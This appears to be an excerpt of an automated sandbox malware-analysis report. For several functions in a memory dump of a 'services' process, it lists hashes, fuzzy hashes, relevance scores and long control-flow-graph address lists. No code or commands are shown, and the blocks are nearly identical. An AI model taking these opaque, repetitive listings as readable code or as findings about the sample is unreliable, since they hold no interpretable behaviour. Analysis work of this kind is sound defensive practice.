                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e6fda76bc0dc66545cc769383214262eb0a755dd95c558023be08034f586c73b
                                                                                                                                • Instruction ID: 64cea5e9a303c5c7abe1e03c31a45e61cb4c516549e2e8cbdd8805c9ce2ebee3
                                                                                                                                • Opcode Fuzzy Hash: e6fda76bc0dc66545cc769383214262eb0a755dd95c558023be08034f586c73b
                                                                                                                                • Instruction Fuzzy Hash: 6E52DF71A09A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD72A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC782 Relevance: .7, Instructions: 684COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 882 7ffd9b7ac782-7ffd9b7ac805 887 7ffd9b7aca0f-7ffd9b7aca1b 882->887 888 7ffd9b7aca26-7ffd9b7aca4d 887->888 891 7ffd9b7ac5ec-7ffd9b7ac68a 888->891 892 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 888->892 905 7ffd9b7ac68c-7ffd9b7ac6af 891->905 906 7ffd9b7ac6ba-7ffd9b7ac6c9 891->906 902 7ffd9b7aca89-7ffd9b7aca97 892->902 904 7ffd9b7acaa2-7ffd9b7acb49 902->904 923 7ffd9b7acc56-7ffd9b7accae 904->923 924 7ffd9b7acb4f-7ffd9b7acb66 904->924 905->906 908 7ffd9b7ac6cb 906->908 909 7ffd9b7ac6d0-7ffd9b7ac6df 906->909 908->909 911 7ffd9b7ac6f4-7ffd9b7ac70f 909->911 912 7ffd9b7ac6e1-7ffd9b7ac6ef 909->912 913 7ffd9b7ac72f-7ffd9b7aca04 911->913 914 7ffd9b7ac711-7ffd9b7ac72b 911->914 912->888 913->887 914->913 935 7ffd9b7ace45-7ffd9b7acf21 923->935 936 7ffd9b7accb4-7ffd9b7accff 923->936 927 7ffd9b7acb68-7ffd9b7acbae 924->927 928 7ffd9b7acbb2-7ffd9b7acc4d 924->928 927->928 928->923 956 7ffd9b7acc4f 928->956 969 7ffd9b7acf27-7ffd9b7ad000 935->969 970 7ffd9b7ad002-7ffd9b7ad048 935->970 946 7ffd9b7ace2c-7ffd9b7ace39 936->946 947 7ffd9b7ace3f-7ffd9b7ace40 946->947 948 7ffd9b7acd04-7ffd9b7acd12 946->948 950 7ffd9b7ad1fd-7ffd9b7ad25c 947->950 952 7ffd9b7acd19-7ffd9b7acd99 948->952 953 7ffd9b7acd14 948->953 967 7ffd9b7ad524-7ffd9b7ad551 950->967 965 7ffd9b7acd9b 952->965 966 7ffd9b7acda0-7ffd9b7ace1a 952->966 953->952 956->923 965->966 998 7ffd9b7ace1c-7ffd9b7ace21 966->998 999 7ffd9b7ace24-7ffd9b7ace29 966->999 975 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 967->975 976 7ffd9b7ad261-7ffd9b7ad29d 967->976 988 7ffd9b7ad04f-7ffd9b7ad055 969->988 970->988 995 7ffd9b7ad57d 975->995 996 7ffd9b7ad584-7ffd9b7ad5b8 975->996 985 7ffd9b7ad2ba-7ffd9b7ad521 976->985 986 7ffd9b7ad29f-7ffd9b7ad2b6 976->986 985->967 986->985 991 7ffd9b7ad1ea-7ffd9b7ad1f7 988->991 991->950 994 7ffd9b7ad05a-7ffd9b7ad068 991->994 1000 7ffd9b7ad06a 994->1000 1001 7ffd9b7ad06f-7ffd9b7ad10f 994->1001 995->996 1007 7ffd9b7ad5d8-7ffd9b7ad5f5 996->1007 1008 7ffd9b7ad5ba-7ffd9b7ad5c7 996->1008 998->999 999->946 1000->1001 1037 7ffd9b7ad17f-7ffd9b7ad1a7 1001->1037 1038 7ffd9b7ad111-7ffd9b7ad139 1001->1038 1014 7ffd9b7ad5fb-7ffd9b7ad6f9 1007->1014 1015 7ffd9b7ad7b4-7ffd9b7ad7b8 1007->1015 1012 7ffd9b7ad5c9 1008->1012 1013 7ffd9b7ad5ce-7ffd9b7ad5d6 1008->1013 1012->1013 1013->1007 1014->1015 1071 7ffd9b7ad6ff-7ffd9b7ad70b 1014->1071 1016 7ffd9b7adac7-7ffd9b7adb1f 1015->1016 1017 7ffd9b7ad7be-7ffd9b7ad7c7 1015->1017 1039 7ffd9b7adc87-7ffd9b7adc95 1016->1039 1040 7ffd9b7adb25-7ffd9b7adbba 1016->1040 1021 7ffd9b7ad7c9-7ffd9b7ad7ce 1017->1021 1022 7ffd9b7ad7d1-7ffd9b7ad7da 1017->1022 1021->1022 1026 7ffd9b7adab1-7ffd9b7adac1 1022->1026 1026->1016 1028 7ffd9b7ad7df-7ffd9b7ad7f0 1026->1028 1031 7ffd9b7ad7f7-7ffd9b7ad897 1028->1031 1032 7ffd9b7ad7f2 1028->1032 1065 7ffd9b7ad89d-7ffd9b7ad8fd 1031->1065 1066 7ffd9b7adaa3-7ffd9b7adaab 1031->1066 1032->1031 1047 7ffd9b7ad1a9 1037->1047 1048 7ffd9b7ad1ae-7ffd9b7ad1d7 1037->1048 1042 7ffd9b7ad13b 1038->1042 1043 7ffd9b7ad140-7ffd9b7ad17d 1038->1043 1040->1039 1070 7ffd9b7adbc0-7ffd9b7adbd1 1040->1070 1042->1043 1055 7ffd9b7ad1e2-7ffd9b7ad1e7 1043->1055 1047->1048 1048->1055 1055->991 1079 7ffd9b7ad8ff 1065->1079 1080 7ffd9b7ad904-7ffd9b7ad90d 1065->1080 1066->1026 1073 7ffd9b7adbd8-7ffd9b7adc85 1070->1073 1074 7ffd9b7adbd3 1070->1074 1071->1015 1075 7ffd9b7ad711-7ffd9b7ad7a9 1071->1075 1073->1039 1074->1073 1075->1015 1079->1080 1083 7ffd9b7ada7c-7ffd9b7ada8a 1080->1083 1084 7ffd9b7ad913-7ffd9b7ad96b 1080->1084 1088 7ffd9b7ada8c 1083->1088 1089 7ffd9b7ada91-7ffd9b7ada99 1083->1089 1096 7ffd9b7ad9f7-7ffd9b7ada25 1084->1096 1097 7ffd9b7ad971-7ffd9b7ad99d 1084->1097 1088->1089 1090 7ffd9b7ada9b-7ffd9b7adaa0 1089->1090 1090->1066 1098 7ffd9b7ada27 1096->1098 1099 7ffd9b7ada2c-7ffd9b7ada7a 1096->1099 1100 7ffd9b7ad99f 1097->1100 1101 7ffd9b7ad9a4-7ffd9b7ad9f2 1097->1101 1098->1099 1099->1090 1100->1101 1101->1090
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9edfaed629f1aea4356c7ccafa42bcc1393f0f4ea7c5e879a239a2f836c58cb1
                                                                                                                                • Instruction ID: c4844c72c9422e2eff8054b5428cea92cc141f35a4014957e76605285e7a35b7
                                                                                                                                • Opcode Fuzzy Hash: 9edfaed629f1aea4356c7ccafa42bcc1393f0f4ea7c5e879a239a2f836c58cb1
                                                                                                                                • Instruction Fuzzy Hash: F142CE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC926 Relevance: .7, Instructions: 675COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1106 7ffd9b7ac926-7ffd9b7ac96f 1110 7ffd9b7ac9c8-7ffd9b7ac9ce 1106->1110 1111 7ffd9b7ac9d0-7ffd9b7ac9df 1110->1111 1112 7ffd9b7ac971-7ffd9b7ac9ac 1110->1112 1113 7ffd9b7aca0f-7ffd9b7aca1b 1111->1113 1115 7ffd9b7ac9ae 1112->1115 1116 7ffd9b7ac9b3-7ffd9b7ac9c5 1112->1116 1117 7ffd9b7aca26-7ffd9b7aca4d 1113->1117 1115->1116 1116->1110 1120 7ffd9b7ac5ec-7ffd9b7ac68a 1117->1120 1121 7ffd9b7aca53-7ffd9b7aca97 call 7ffd9b7adc96 1117->1121 1134 7ffd9b7ac68c-7ffd9b7ac6af 1120->1134 1135 7ffd9b7ac6ba-7ffd9b7ac6c9 1120->1135 1133 7ffd9b7acaa2-7ffd9b7acb49 1121->1133 1152 7ffd9b7acc56-7ffd9b7accae 1133->1152 1153 7ffd9b7acb4f-7ffd9b7acb66 1133->1153 1134->1135 1137 7ffd9b7ac6cb 1135->1137 1138 7ffd9b7ac6d0-7ffd9b7ac6df 1135->1138 1137->1138 1140 7ffd9b7ac6f4-7ffd9b7ac70f 1138->1140 1141 7ffd9b7ac6e1-7ffd9b7ac6ef 1138->1141 1142 7ffd9b7ac72f-7ffd9b7aca04 1140->1142 1143 7ffd9b7ac711-7ffd9b7ac72b 1140->1143 1141->1117 1142->1113 1143->1142 1164 7ffd9b7ace45-7ffd9b7acf21 1152->1164 1165 7ffd9b7accb4-7ffd9b7accff 1152->1165 1156 7ffd9b7acb68-7ffd9b7acbae 1153->1156 1157 7ffd9b7acbb2-7ffd9b7acc4d 1153->1157 1156->1157 1157->1152 1185 7ffd9b7acc4f 1157->1185 1198 7ffd9b7acf27-7ffd9b7ad000 1164->1198 1199 7ffd9b7ad002-7ffd9b7ad048 1164->1199 1175 7ffd9b7ace2c-7ffd9b7ace39 1165->1175 1176 7ffd9b7ace3f-7ffd9b7ace40 1175->1176 1177 7ffd9b7acd04-7ffd9b7acd12 1175->1177 1179 7ffd9b7ad1fd-7ffd9b7ad25c 1176->1179 1181 7ffd9b7acd19-7ffd9b7acd99 1177->1181 1182 7ffd9b7acd14 1177->1182 1196 7ffd9b7ad524-7ffd9b7ad551 1179->1196 1194 7ffd9b7acd9b 1181->1194 1195 7ffd9b7acda0-7ffd9b7ace1a 1181->1195 1182->1181 1185->1152 1194->1195 1227 7ffd9b7ace1c-7ffd9b7ace21 1195->1227 1228 7ffd9b7ace24-7ffd9b7ace29 1195->1228 1204 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 1196->1204 1205 7ffd9b7ad261-7ffd9b7ad29d 1196->1205 1217 7ffd9b7ad04f-7ffd9b7ad055 1198->1217 1199->1217 1224 7ffd9b7ad57d 1204->1224 1225 7ffd9b7ad584-7ffd9b7ad5b8 1204->1225 1214 7ffd9b7ad2ba-7ffd9b7ad521 1205->1214 1215 7ffd9b7ad29f-7ffd9b7ad2b6 1205->1215 1214->1196 1215->1214 1220 7ffd9b7ad1ea-7ffd9b7ad1f7 1217->1220 1220->1179 1223 7ffd9b7ad05a-7ffd9b7ad068 1220->1223 1229 7ffd9b7ad06a 1223->1229 1230 7ffd9b7ad06f-7ffd9b7ad10f 1223->1230 1224->1225 1236 7ffd9b7ad5d8-7ffd9b7ad5f5 1225->1236 1237 7ffd9b7ad5ba-7ffd9b7ad5c7 1225->1237 1227->1228 1228->1175 1229->1230 1266 7ffd9b7ad17f-7ffd9b7ad1a7 1230->1266 1267 7ffd9b7ad111-7ffd9b7ad139 1230->1267 1243 7ffd9b7ad5fb-7ffd9b7ad6f9 1236->1243 1244 7ffd9b7ad7b4-7ffd9b7ad7b8 1236->1244 1241 7ffd9b7ad5c9 1237->1241 1242 7ffd9b7ad5ce-7ffd9b7ad5d6 1237->1242 1241->1242 1242->1236 1243->1244 1300 7ffd9b7ad6ff-7ffd9b7ad70b 1243->1300 1245 7ffd9b7adac7-7ffd9b7adb1f 1244->1245 1246 7ffd9b7ad7be-7ffd9b7ad7c7 1244->1246 1268 7ffd9b7adc87-7ffd9b7adc95 1245->1268 1269 7ffd9b7adb25-7ffd9b7adbba 1245->1269 1250 7ffd9b7ad7c9-7ffd9b7ad7ce 1246->1250 1251 7ffd9b7ad7d1-7ffd9b7ad7da 1246->1251 1250->1251 1255 7ffd9b7adab1-7ffd9b7adac1 1251->1255 1255->1245 1257 7ffd9b7ad7df-7ffd9b7ad7f0 1255->1257 1260 7ffd9b7ad7f7-7ffd9b7ad897 1257->1260 1261 7ffd9b7ad7f2 1257->1261 1294 7ffd9b7ad89d-7ffd9b7ad8fd 1260->1294 1295 7ffd9b7adaa3-7ffd9b7adaab 1260->1295 1261->1260 1276 7ffd9b7ad1a9 1266->1276 1277 7ffd9b7ad1ae-7ffd9b7ad1d7 1266->1277 1271 7ffd9b7ad13b 1267->1271 1272 7ffd9b7ad140-7ffd9b7ad17d 1267->1272 1269->1268 1299 7ffd9b7adbc0-7ffd9b7adbd1 1269->1299 1271->1272 1284 7ffd9b7ad1e2-7ffd9b7ad1e7 1272->1284 1276->1277 1277->1284 1284->1220 1308 7ffd9b7ad8ff 1294->1308 1309 7ffd9b7ad904-7ffd9b7ad90d 1294->1309 1295->1255 1302 7ffd9b7adbd8-7ffd9b7adc85 1299->1302 1303 7ffd9b7adbd3 1299->1303 1300->1244 1304 7ffd9b7ad711-7ffd9b7ad7a9 1300->1304 1302->1268 1303->1302 1304->1244 1308->1309 1312 7ffd9b7ada7c-7ffd9b7ada8a 1309->1312 1313 7ffd9b7ad913-7ffd9b7ad96b 1309->1313 1317 7ffd9b7ada8c 1312->1317 1318 7ffd9b7ada91-7ffd9b7ada99 1312->1318 1325 7ffd9b7ad9f7-7ffd9b7ada25 1313->1325 1326 7ffd9b7ad971-7ffd9b7ad99d 1313->1326 1317->1318 1319 7ffd9b7ada9b-7ffd9b7adaa0 1318->1319 1319->1295 1327 7ffd9b7ada27 1325->1327 1328 7ffd9b7ada2c-7ffd9b7ada7a 1325->1328 1329 7ffd9b7ad99f 1326->1329 1330 7ffd9b7ad9a4-7ffd9b7ad9f2 1326->1330 1327->1328 1328->1319 1329->1330 1330->1319
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d7b5475d13665454536e12fe1641145daff68026449997891abb8d3c8645220c
                                                                                                                                • Instruction ID: 6b8b16f45ae6fd201de12eac411992b4cb51f5799c730e315636cf4d6bef3a0b
                                                                                                                                • Opcode Fuzzy Hash: d7b5475d13665454536e12fe1641145daff68026449997891abb8d3c8645220c
                                                                                                                                • Instruction Fuzzy Hash: D942EF71A09A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC735 Relevance: .7, Instructions: 663COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1335 7ffd9b7ac735-7ffd9b7ac77d 1338 7ffd9b7aca0f-7ffd9b7aca1b 1335->1338 1339 7ffd9b7aca26-7ffd9b7aca4d 1338->1339 1342 7ffd9b7ac5ec-7ffd9b7ac68a 1339->1342 1343 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 1339->1343 1356 7ffd9b7ac68c-7ffd9b7ac6af 1342->1356 1357 7ffd9b7ac6ba-7ffd9b7ac6c9 1342->1357 1353 7ffd9b7aca89-7ffd9b7aca97 1343->1353 1355 7ffd9b7acaa2-7ffd9b7acb49 1353->1355 1374 7ffd9b7acc56-7ffd9b7accae 1355->1374 1375 7ffd9b7acb4f-7ffd9b7acb66 1355->1375 1356->1357 1359 7ffd9b7ac6cb 1357->1359 1360 7ffd9b7ac6d0-7ffd9b7ac6df 1357->1360 1359->1360 1362 7ffd9b7ac6f4-7ffd9b7ac70f 1360->1362 1363 7ffd9b7ac6e1-7ffd9b7ac6ef 1360->1363 1364 7ffd9b7ac72f-7ffd9b7aca04 1362->1364 1365 7ffd9b7ac711-7ffd9b7ac72b 1362->1365 1363->1339 1364->1338 1365->1364 1386 7ffd9b7ace45-7ffd9b7acf21 1374->1386 1387 7ffd9b7accb4-7ffd9b7accff 1374->1387 1378 7ffd9b7acb68-7ffd9b7acbae 1375->1378 1379 7ffd9b7acbb2-7ffd9b7acc4d 1375->1379 1378->1379 1379->1374 1407 7ffd9b7acc4f 1379->1407 1420 7ffd9b7acf27-7ffd9b7ad000 1386->1420 1421 7ffd9b7ad002-7ffd9b7ad048 1386->1421 1397 7ffd9b7ace2c-7ffd9b7ace39 1387->1397 1398 7ffd9b7ace3f-7ffd9b7ace40 1397->1398 1399 7ffd9b7acd04-7ffd9b7acd12 1397->1399 1401 7ffd9b7ad1fd-7ffd9b7ad25c 1398->1401 1403 7ffd9b7acd19-7ffd9b7acd99 1399->1403 1404 7ffd9b7acd14 1399->1404 1418 7ffd9b7ad524-7ffd9b7ad551 1401->1418 1416 7ffd9b7acd9b 1403->1416 1417 7ffd9b7acda0-7ffd9b7ace1a 1403->1417 1404->1403 1407->1374 1416->1417 1449 7ffd9b7ace1c-7ffd9b7ace21 1417->1449 1450 7ffd9b7ace24-7ffd9b7ace29 1417->1450 1426 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 1418->1426 1427 7ffd9b7ad261-7ffd9b7ad29d 1418->1427 1439 7ffd9b7ad04f-7ffd9b7ad055 1420->1439 1421->1439 1446 7ffd9b7ad57d 1426->1446 1447 7ffd9b7ad584-7ffd9b7ad5b8 1426->1447 1436 7ffd9b7ad2ba-7ffd9b7ad521 1427->1436 1437 7ffd9b7ad29f-7ffd9b7ad2b6 1427->1437 1436->1418 1437->1436 1442 7ffd9b7ad1ea-7ffd9b7ad1f7 1439->1442 1442->1401 1445 7ffd9b7ad05a-7ffd9b7ad068 1442->1445 1451 7ffd9b7ad06a 1445->1451 1452 7ffd9b7ad06f-7ffd9b7ad10f 1445->1452 1446->1447 1458 7ffd9b7ad5d8-7ffd9b7ad5f5 1447->1458 1459 7ffd9b7ad5ba-7ffd9b7ad5c7 1447->1459 1449->1450 1450->1397 1451->1452 1488 7ffd9b7ad17f-7ffd9b7ad1a7 1452->1488 1489 7ffd9b7ad111-7ffd9b7ad139 1452->1489 1465 7ffd9b7ad5fb-7ffd9b7ad6f9 1458->1465 1466 7ffd9b7ad7b4-7ffd9b7ad7b8 1458->1466 1463 7ffd9b7ad5c9 1459->1463 1464 7ffd9b7ad5ce-7ffd9b7ad5d6 1459->1464 1463->1464 1464->1458 1465->1466 1522 7ffd9b7ad6ff-7ffd9b7ad70b 1465->1522 1467 7ffd9b7adac7-7ffd9b7adb1f 1466->1467 1468 7ffd9b7ad7be-7ffd9b7ad7c7 1466->1468 1490 7ffd9b7adc87-7ffd9b7adc95 1467->1490 1491 7ffd9b7adb25-7ffd9b7adbba 1467->1491 1472 7ffd9b7ad7c9-7ffd9b7ad7ce 1468->1472 1473 7ffd9b7ad7d1-7ffd9b7ad7da 1468->1473 1472->1473 1477 7ffd9b7adab1-7ffd9b7adac1 1473->1477 1477->1467 1479 7ffd9b7ad7df-7ffd9b7ad7f0 1477->1479 1482 7ffd9b7ad7f7-7ffd9b7ad897 1479->1482 1483 7ffd9b7ad7f2 1479->1483 1516 7ffd9b7ad89d-7ffd9b7ad8fd 1482->1516 1517 7ffd9b7adaa3-7ffd9b7adaab 1482->1517 1483->1482 1498 7ffd9b7ad1a9 1488->1498 1499 7ffd9b7ad1ae-7ffd9b7ad1d7 1488->1499 1493 7ffd9b7ad13b 1489->1493 1494 7ffd9b7ad140-7ffd9b7ad17d 1489->1494 1491->1490 1521 7ffd9b7adbc0-7ffd9b7adbd1 1491->1521 1493->1494 1506 7ffd9b7ad1e2-7ffd9b7ad1e7 1494->1506 1498->1499 1499->1506 1506->1442 1530 7ffd9b7ad8ff 1516->1530 1531 7ffd9b7ad904-7ffd9b7ad90d 1516->1531 1517->1477 1524 7ffd9b7adbd8-7ffd9b7adc85 1521->1524 1525 7ffd9b7adbd3 1521->1525 1522->1466 1526 7ffd9b7ad711-7ffd9b7ad7a9 1522->1526 1524->1490 1525->1524 1526->1466 1530->1531 1534 7ffd9b7ada7c-7ffd9b7ada8a 1531->1534 1535 7ffd9b7ad913-7ffd9b7ad96b 1531->1535 1539 7ffd9b7ada8c 1534->1539 1540 7ffd9b7ada91-7ffd9b7ada99 1534->1540 1547 7ffd9b7ad9f7-7ffd9b7ada25 1535->1547 1548 7ffd9b7ad971-7ffd9b7ad99d 1535->1548 1539->1540 1541 7ffd9b7ada9b-7ffd9b7adaa0 1540->1541 1541->1517 1549 7ffd9b7ada27 1547->1549 1550 7ffd9b7ada2c-7ffd9b7ada7a 1547->1550 1551 7ffd9b7ad99f 1548->1551 1552 7ffd9b7ad9a4-7ffd9b7ad9f2 1548->1552 1549->1550 1550->1541 1551->1552 1552->1541
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 541b8a9b45813ce709b86e4fa2d7be0472cc556e811aac1d04b512899591a72b
                                                                                                                                • Instruction ID: afbde723e0a66a74b843b3f06a0dffa6a233cf8e75af75eafcedfaeef0d6c219
                                                                                                                                • Opcode Fuzzy Hash: 541b8a9b45813ce709b86e4fa2d7be0472cc556e811aac1d04b512899591a72b
                                                                                                                                • Instruction Fuzzy Hash: FB42CE71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC90C Relevance: .6, Instructions: 647COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 1779 7ffd9b7ac90c-7ffd9b7ac90e 1780 7ffd9b7ac910-7ffd9b7ac916 1779->1780 1781 7ffd9b7ac921 1779->1781 1780->1781 1782 7ffd9b7aca0f-7ffd9b7aca1b 1781->1782 1783 7ffd9b7aca26-7ffd9b7aca4d 1782->1783 1786 7ffd9b7ac5ec-7ffd9b7ac68a 1783->1786 1787 7ffd9b7aca53-7ffd9b7aca87 call 7ffd9b7adc96 1783->1787 1800 7ffd9b7ac68c-7ffd9b7ac6af 1786->1800 1801 7ffd9b7ac6ba-7ffd9b7ac6c9 1786->1801 1797 7ffd9b7aca89-7ffd9b7aca97 1787->1797 1799 7ffd9b7acaa2-7ffd9b7acb49 1797->1799 1818 7ffd9b7acc56-7ffd9b7accae 1799->1818 1819 7ffd9b7acb4f-7ffd9b7acb66 1799->1819 1800->1801 1803 7ffd9b7ac6cb 1801->1803 1804 7ffd9b7ac6d0-7ffd9b7ac6df 1801->1804 1803->1804 1806 7ffd9b7ac6f4-7ffd9b7ac70f 1804->1806 1807 7ffd9b7ac6e1-7ffd9b7ac6ef 1804->1807 1808 7ffd9b7ac72f-7ffd9b7aca04 1806->1808 1809 7ffd9b7ac711-7ffd9b7ac72b 1806->1809 1807->1783 1808->1782 1809->1808 1830 7ffd9b7ace45-7ffd9b7acf21 1818->1830 1831 7ffd9b7accb4-7ffd9b7accff 1818->1831 1822 7ffd9b7acb68-7ffd9b7acbae 1819->1822 1823 7ffd9b7acbb2-7ffd9b7acc4d 1819->1823 1822->1823 1823->1818 1851 7ffd9b7acc4f 1823->1851 1864 7ffd9b7acf27-7ffd9b7ad000 1830->1864 1865 7ffd9b7ad002-7ffd9b7ad048 1830->1865 1841 7ffd9b7ace2c-7ffd9b7ace39 1831->1841 1842 7ffd9b7ace3f-7ffd9b7ace40 1841->1842 1843 7ffd9b7acd04-7ffd9b7acd12 1841->1843 1845 7ffd9b7ad1fd-7ffd9b7ad25c 1842->1845 1847 7ffd9b7acd19-7ffd9b7acd99 1843->1847 1848 7ffd9b7acd14 1843->1848 1862 7ffd9b7ad524-7ffd9b7ad551 1845->1862 1860 7ffd9b7acd9b 1847->1860 1861 7ffd9b7acda0-7ffd9b7ace1a 1847->1861 1848->1847 1851->1818 1860->1861 1893 7ffd9b7ace1c-7ffd9b7ace21 1861->1893 1894 7ffd9b7ace24-7ffd9b7ace29 1861->1894 1870 7ffd9b7ad557-7ffd9b7ad57b call 7ffd9b7adcf9 1862->1870 1871 7ffd9b7ad261-7ffd9b7ad29d 1862->1871 1883 7ffd9b7ad04f-7ffd9b7ad055 1864->1883 1865->1883 1890 7ffd9b7ad57d 1870->1890 1891 7ffd9b7ad584-7ffd9b7ad5b8 1870->1891 1880 7ffd9b7ad2ba-7ffd9b7ad521 1871->1880 1881 7ffd9b7ad29f-7ffd9b7ad2b6 1871->1881 1880->1862 1881->1880 1886 7ffd9b7ad1ea-7ffd9b7ad1f7 1883->1886 1886->1845 1889 7ffd9b7ad05a-7ffd9b7ad068 1886->1889 1895 7ffd9b7ad06a 1889->1895 1896 7ffd9b7ad06f-7ffd9b7ad10f 1889->1896 1890->1891 1902 7ffd9b7ad5d8-7ffd9b7ad5f5 1891->1902 1903 7ffd9b7ad5ba-7ffd9b7ad5c7 1891->1903 1893->1894 1894->1841 1895->1896 1932 7ffd9b7ad17f-7ffd9b7ad1a7 1896->1932 1933 7ffd9b7ad111-7ffd9b7ad139 1896->1933 1909 7ffd9b7ad5fb-7ffd9b7ad6f9 1902->1909 1910 7ffd9b7ad7b4-7ffd9b7ad7b8 1902->1910 1907 7ffd9b7ad5c9 1903->1907 1908 7ffd9b7ad5ce-7ffd9b7ad5d6 1903->1908 1907->1908 1908->1902 1909->1910 1966 7ffd9b7ad6ff-7ffd9b7ad70b 1909->1966 1911 7ffd9b7adac7-7ffd9b7adb1f 1910->1911 1912 7ffd9b7ad7be-7ffd9b7ad7c7 1910->1912 1934 7ffd9b7adc87-7ffd9b7adc95 1911->1934 1935 7ffd9b7adb25-7ffd9b7adbba 1911->1935 1916 7ffd9b7ad7c9-7ffd9b7ad7ce 1912->1916 1917 7ffd9b7ad7d1-7ffd9b7ad7da 1912->1917 1916->1917 1921 7ffd9b7adab1-7ffd9b7adac1 1917->1921 1921->1911 1923 7ffd9b7ad7df-7ffd9b7ad7f0 1921->1923 1926 7ffd9b7ad7f7-7ffd9b7ad897 1923->1926 1927 7ffd9b7ad7f2 1923->1927 1960 7ffd9b7ad89d-7ffd9b7ad8fd 1926->1960 1961 7ffd9b7adaa3-7ffd9b7adaab 1926->1961 1927->1926 1942 7ffd9b7ad1a9 1932->1942 1943 7ffd9b7ad1ae-7ffd9b7ad1d7 1932->1943 1937 7ffd9b7ad13b 1933->1937 1938 7ffd9b7ad140-7ffd9b7ad17d 1933->1938 1935->1934 1965 7ffd9b7adbc0-7ffd9b7adbd1 1935->1965 1937->1938 1950 7ffd9b7ad1e2-7ffd9b7ad1e7 1938->1950 1942->1943 1943->1950 1950->1886 1974 7ffd9b7ad8ff 1960->1974 1975 7ffd9b7ad904-7ffd9b7ad90d 1960->1975 1961->1921 1968 7ffd9b7adbd8-7ffd9b7adc85 1965->1968 1969 7ffd9b7adbd3 1965->1969 1966->1910 1970 7ffd9b7ad711-7ffd9b7ad7a9 1966->1970 1968->1934 1969->1968 1970->1910 1974->1975 1978 7ffd9b7ada7c-7ffd9b7ada8a 1975->1978 1979 7ffd9b7ad913-7ffd9b7ad96b 1975->1979 1983 7ffd9b7ada8c 1978->1983 1984 7ffd9b7ada91-7ffd9b7ada99 1978->1984 1991 7ffd9b7ad9f7-7ffd9b7ada25 1979->1991 1992 7ffd9b7ad971-7ffd9b7ad99d 1979->1992 1983->1984 1985 7ffd9b7ada9b-7ffd9b7adaa0 1984->1985 1985->1961 1993 7ffd9b7ada27 1991->1993 1994 7ffd9b7ada2c-7ffd9b7ada7a 1991->1994 1995 7ffd9b7ad99f 1992->1995 1996 7ffd9b7ad9a4-7ffd9b7ad9f2 1992->1996 1993->1994 1994->1985 1995->1996 1996->1985
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000013.00000002.1930515528.00007FFD9B7AB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AB000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_19_2_7ffd9b7ab000_services.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 02fea1c748196c0f516e34dc61344caed7c432cc9c3de22b68b155a560280065
                                                                                                                                • Instruction ID: 3dade068a622027f39d83ffa92a3b976b0f2a4c7b4ab0cf4b8815668ce21744e
                                                                                                                                • Opcode Fuzzy Hash: 02fea1c748196c0f516e34dc61344caed7c432cc9c3de22b68b155a560280065
                                                                                                                                • Instruction Fuzzy Hash: 1D42EF71A19A1D8FDFA8DB58C865BA9B7B1FF98301F1042E9D00DD32A5DA356E81CF40
                                                                                                                                Function 00007FFD9B7AC87E Relevance: .6, Instructions: 647COMMON
                                                                                                                                Download Yara Rule

